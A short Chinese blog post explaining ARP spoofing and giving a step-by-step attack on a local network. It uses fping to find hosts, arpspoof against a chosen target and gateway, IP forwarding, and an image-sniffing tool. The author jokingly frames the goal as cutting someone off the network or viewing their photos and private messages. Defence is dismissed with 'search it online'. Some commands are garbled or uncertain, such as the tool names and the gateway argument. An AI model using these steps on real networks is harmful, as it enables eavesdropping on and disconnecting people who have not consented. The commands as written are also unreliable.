有趣的arp攻擊

沒有網絡安全就沒有國家安全,就沒有所謂安全,人權。但是要是網絡安全沒有用在正確的地方,最後的悲劇就是:“網絡安全學得好,監獄進得早!”


有趣的arp攻擊


arp是地址解析協議,是根據IP地址獲取物理地址的一個TCP/IP協議。主機發送信息時將包含目標IP地址的ARP請求廣播到局域網絡上的所有主機,並接收返回消息,以此確定目標的物理地址;收到返回消息後將該IP地址和物理地址存入本機ARP緩存中並保留一定時間,下次請求時直接查詢ARP緩存以節約資源。地址解析協議是建立在網絡中各個主機互相信任的基礎上的,局域網絡上的主機可以自主發送ARP應答消息,其他主機收到應答報文時不會檢測該報文的真實性就會將其記入本機ARP緩存。

如果進行了在局域網對你進行arp攻擊,那麼你也就沒有什麼秘密可言了,因為你的流量是經過攻擊者的IP過,然後再到達網關。假設,你個美女,只要你幹啥了,他就可以看到你所發送等等的照片,以及信息。如果你是帥哥,哎呀!那你也就難以逃脫那位對你充滿小心的姑娘的手中了。因為你的所有都被緊緊地掌控了。

要是想逃出魔爪,最有效的方法就是斷網,斷了。從此遠離可怕的網絡,遠離廣域網,遠離局域網。這種方法可奏效了,你看李世民,乾隆就沒有被攻擊過。

如果突然發現自己的網速變慢了,可以瞭解一下。因為被攻擊的流量是不受你的帶寬控制了。你的帶寬就算是真實1000兆也沒有用,因為你的出口不在這,在攻擊者那。

arp被攻擊或者是被欺騙的解決方法,可以百度一下。解決所有。

首先查找局域網的IP地址---然後選擇攻擊目標,如果是直接斷網,就1

如果想要看看別人的秘密就2

Fping -asg ip //查看局域網內的IP地址

1、 arpspoof -i 網卡 -t 目標ip 目標網關(這個要不要,我忘了)

2、echo 1 >/proc/sys/net/ipv4/ip_forward //這個是將對方的轉發為自己的,就是攻擊者的IP地址就是被攻擊者的IP地址了

arpspoof -i 網卡 -t 目標ip 目標網關(這個要不要,我忘了)

接著使用dri 網卡

然後就可以看到別人的照片了。(其他的自己腦補)

//因為你的網卡IP地址就是被攻擊者的網關了,ta的流量就是從你這裡出去,所以你能看到被攻擊者的信息。


這裡採用的工具是kail linux。可以自己下載


分享到:


相關文章: